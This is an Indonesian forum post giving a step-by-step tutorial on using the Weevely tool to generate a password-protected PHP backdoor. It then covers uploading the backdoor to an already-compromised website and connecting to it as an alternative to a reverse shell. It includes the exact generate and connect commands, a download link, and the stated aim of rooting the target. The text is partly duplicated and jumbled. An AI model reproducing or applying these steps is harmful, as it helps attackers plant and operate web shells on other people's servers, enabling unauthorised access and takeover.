Weevely ( alternatif BackConnect )
Posted: Sat Jul 13, 2013 9:39 pm
Selama ini seorang attacker setelah mendapat target dan berhasil upload shell selalu melakukan backconnect untuk melakukan rooting target,tapi setahu saya ( yg saya tahu lho ya 
) untuk melakukan backconnect harus mempunyai IP PUBLIC,lha yg pake koneksi modem kaya saya jelas gak bisa ( atau tepatnya belum tahu caranya ),tapi kini ada alternatif lain yaitu menggunakan Weevely.Pada BT tools ini sudah tersedia,kalau versi windows bisa download di:
install dulu python dan pyreadline-2.0.win32 bagi yg pake windows
Pertama-tama kita ciptakan backdoor menggunakan weevely,pada kasus ini saya beri passsword j0ck3r jadi perintahnya:
versi windows
lalu setelah tercipta backdoornya,kita upload ke website injekan kita tadi,lalu kembali ke weevely,untuk menciptakan koneksi kita ketikkan perintah:
versi windows
nha jadilah sesi backconnect
) untuk melakukan backconnect harus mempunyai IP PUBLIC,lha yg pake koneksi modem kaya saya jelas gak bisa ( atau tepatnya belum tahu caranya ),tapi kini ada alternatif lain yaitu menggunakan Weevely.Pada BT tools ini sudah tersedia,kalau versi windows bisa download di:
Code: Select all
http://www.mediafire.com/?bdye3fa98gg72szPertama-tama kita ciptakan backdoor menggunakan weevely,pada kasus ini saya beri passsword j0ck3r jadi perintahnya:
Code: Select all
./weevely.py generate j0ck3rCode: Select all
main.py -g -o nama_backdoor.php passwordlalu setelah tercipta backdoornya,kita upload ke website injekan kita tadi,lalu kembali ke weevely,untuk menciptakan koneksi kita ketikkan perintah:
Code: Select all
./weevely.py www.target.com/path/weevely.php j0ck3rversi windows
Code: Select all
main.py -t -u www.target.com/path/nama_backdoor.php -p password